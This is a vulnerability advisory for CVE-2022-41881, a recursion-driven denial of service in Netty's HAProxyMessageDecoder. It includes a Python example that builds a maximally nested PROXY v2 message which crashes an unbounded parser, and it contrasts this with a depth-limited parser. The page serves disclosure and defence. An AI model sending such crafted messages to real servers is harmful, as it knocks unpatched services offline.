CVE-2022-41881
Denial of Service (DoS) vulnerability in netty-codec-haproxy (Maven)
What is CVE-2022-41881 About?
This vulnerability is a Denial of Service (DoS) in Netty's HAProxyMessageDecoder, caused by unbounded recursion when parsing a crafted PROXY protocol message. The recursion ends in a StackOverflowError, which can terminate the application, so it is a high-impact DoS. Exploitation only requires sending a specially structured message, which is easy to build.
Affected Software
io.netty:netty-codec-haproxy (Maven), versions before 4.1.86.Final.
Technical Details
A StackOverflowError can be raised in Netty's HAProxyMessageDecoder when parsing a malformed crafted message, due to unbounded recursion. It occurs when a TLV (Type-Length-Value) with type = PP2_TYPE_SSL is parsed and its value is itself another TLV with type = PP2_TYPE_SSL, and so on. Each TLV length is limited to 0xffff bytes, which bounds the nesting depth, but the bound is still large enough that a sufficiently deep nesting triggers a StackOverflowError. If the HAProxyMessageDecoder is used directly without Netty's ChannelPipeline, this unhandled Error will crash the application, resulting in a denial of service; inside a pipeline the Error is delivered to exceptionCaught, so the outcome depends on how the handler chain treats it. The root cause is recursive parsing of nested TLVs without a depth check.
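The nesting described above, as an added example written for this page (not Netty's code): it builds a PROXY protocol v2 message whose PP2_TYPE_SSL TLV contains another PP2_TYPE_SSL TLV, repeated to the depth the 16-bit length fields allow, then parses it with the unbounded recursion pattern and with a depth limit. The wire layout follows the PROXY protocol v2 specification; the depth limit, the sample addresses and the helper names are this example's own assumptions.

```python
"""Nested PP2_TYPE_SSL TLVs: building the malformed message and parsing it safely.

Added example, not Netty code. Wire layout follows the PROXY protocol v2
spec (signature, version/command, family/transport, 16-bit length, addresses,
then TLVs; each TLV is 1-byte type, 16-bit length, value; PP2_TYPE_SSL carries
1 byte client flags and 4 bytes verify before its sub-TLVs). The depth limit
value, sample addresses and all helper names are this example's own choices.
"""
import struct
from typing import List, Optional

PP2_SIGNATURE = b"\r\n\r\n\x00\r\nQUIT\n"
PP2_VERSION_PROXY = 0x21      # version 2, PROXY command
PP2_AF_INET_STREAM = 0x11     # TCP over IPv4
PP2_TYPE_NOOP = 0x04
PP2_TYPE_SSL = 0x20
PP2_SSL_PREFIX = struct.pack(">BI", 0x00, 0)  # client flags, verify result
MAX_TLV_LEN = 0xFFFF


def tlv(tlv_type: int, value: bytes) -> bytes:
    """Encode one TLV; the 16-bit length field caps the value at 0xffff bytes."""
    if len(value) > MAX_TLV_LEN:
        raise ValueError("TLV value exceeds the 16-bit length field")
    return struct.pack(">BH", tlv_type, len(value)) + value


def nested_ssl_tlv(depth: int) -> bytes:
    """A PP2_TYPE_SSL TLV whose sub-TLV is another PP2_TYPE_SSL TLV, `depth` levels deep.

    Each level costs 3 (TLV header) + 5 (client + verify) bytes, so the 0xffff
    cap on the outermost value bounds the depth at 8191 levels in one TLV.
    """
    inner = tlv(PP2_TYPE_NOOP, b"\x00")  # innermost leaf, 4 bytes
    for _ in range(depth):
        inner = tlv(PP2_TYPE_SSL, PP2_SSL_PREFIX + inner)
    return inner


def proxy_v2_header(tlvs: bytes) -> bytes:
    """Wrap TLVs in a complete PROXY v2 header (constructed sample addresses)."""
    addresses = struct.pack(">4s4sHH", b"\x0a\x00\x00\x01", b"\x0a\x00\x00\x02", 40000, 443)
    body = addresses + tlvs
    if len(body) > MAX_TLV_LEN:  # the header's own length field is 16-bit too
        raise ValueError("header body exceeds the 16-bit length field")
    return (PP2_SIGNATURE + bytes([PP2_VERSION_PROXY, PP2_AF_INET_STREAM])
            + struct.pack(">H", len(body)) + body)


def parse_tlvs(buf: bytes, max_depth: Optional[int], _depth: int = 0) -> List[tuple]:
    """Parse a run of TLVs, recursing into PP2_TYPE_SSL sub-TLVs.

    max_depth=None reproduces the unbounded recursion pattern: a deeply nested
    message then dies with RecursionError, Python's counterpart of the JVM
    StackOverflowError. With a limit, over-nested input is rejected instead.
    """
    out: List[tuple] = []
    pos = 0
    while len(buf) - pos >= 3:
        tlv_type, length = struct.unpack_from(">BH", buf, pos)
        pos += 3
        value = buf[pos:pos + length]
        if len(value) != length:
            raise ValueError("truncated TLV")
        pos += length
        if tlv_type == PP2_TYPE_SSL:
            if max_depth is not None and _depth >= max_depth:
                raise ValueError("PP2_TYPE_SSL nested deeper than %d levels" % max_depth)
            if len(value) < 5:
                raise ValueError("PP2_TYPE_SSL value shorter than client+verify")
            client, verify = struct.unpack_from(">BI", value, 0)
            subs = parse_tlvs(value[5:], max_depth, _depth + 1)
            out.append(("ssl", client, verify, subs))
        else:
            out.append((tlv_type, value))
    return out


def crashes_without_limit(depth: int) -> bool:
    """True if parsing a `depth`-level nesting bomb blows the stack when unlimited."""
    try:
        parse_tlvs(nested_ssl_tlv(depth), max_depth=None)
        return False
    except RecursionError:
        return True


if __name__ == "__main__":
    # 8189 is the deepest nesting that still fits the IPv4 PROXY v2 header length field.
    bomb = proxy_v2_header(nested_ssl_tlv(8189))
    print("message bytes:", len(bomb))
    print("unbounded parser crashes:", crashes_without_limit(8189))
    try:
        parse_tlvs(bomb[28:], max_depth=8)  # 28 = signature + 4 header bytes + IPv4 addresses
    except ValueError as e:
        print("bounded parser rejected it:", e)
```

The two 16-bit length fields are why the advisory can say the depth is limited yet still dangerous: one IPv4 PROXY v2 message carries up to 8189 nested PP2_TYPE_SSL levels, and every level is one more recursive frame. A parser that carries an explicit depth counter, as parse_tlvs does when max_depth is set, rejects such input in constant stack instead of relying on the runtime's stack limit.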
What is the Impact of CVE-2022-41881?
Successful exploitation may allow attackers to terminate the application, leading to a denial of service and disrupting the availability of the affected system.
What is the Exploitability of CVE-2022-41881?
Exploitation involves sending a PROXY protocol message whose PP2_TYPE_SSL TLVs are nested deeply enough to exhaust the decoder's stack. The attack is remote and requires no authentication or special privileges; any peer that can deliver a message to the decoder can mount it, and the message is easy to construct. Exposure is highest where the decoder accepts PROXY protocol headers from untrusted peers (it is intended to sit behind a trusted load balancer) and where HAProxyMessageDecoder is used outside of Netty's ChannelPipeline, so the StackOverflowError goes unhandled.
What are the Known Public Exploits?
| PoC Author | Link | Commentary |
|---|---|---|
| No known exploits | | |
What are the Available Fixes for CVE-2022-41881?
Available Upgrade Options
- io.netty:netty-codec-haproxy
- <4.1.86.Final → Upgrade to 4.1.86.Final
Additional Resources
- https://nvd.nist.gov/vuln/detail/CVE-2022-41881
- https://github.com/netty/netty
- https://github.com/netty/netty/security/advisories/GHSA-fx2c-96vj-985v
- https://osv.dev/vulnerability/GHSA-fx2c-96vj-985v
- https://security.netapp.com/advisory/ntap-20230113-0004/
- https://www.debian.org/security/2023/dsa-5316
- https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html
What are Similar Vulnerabilities to CVE-2022-41881?
Similar Vulnerabilities: CVE-2022-41966, CVE-2017-7521, CVE-2019-12086, CVE-2020-10687, CVE-2021-44228
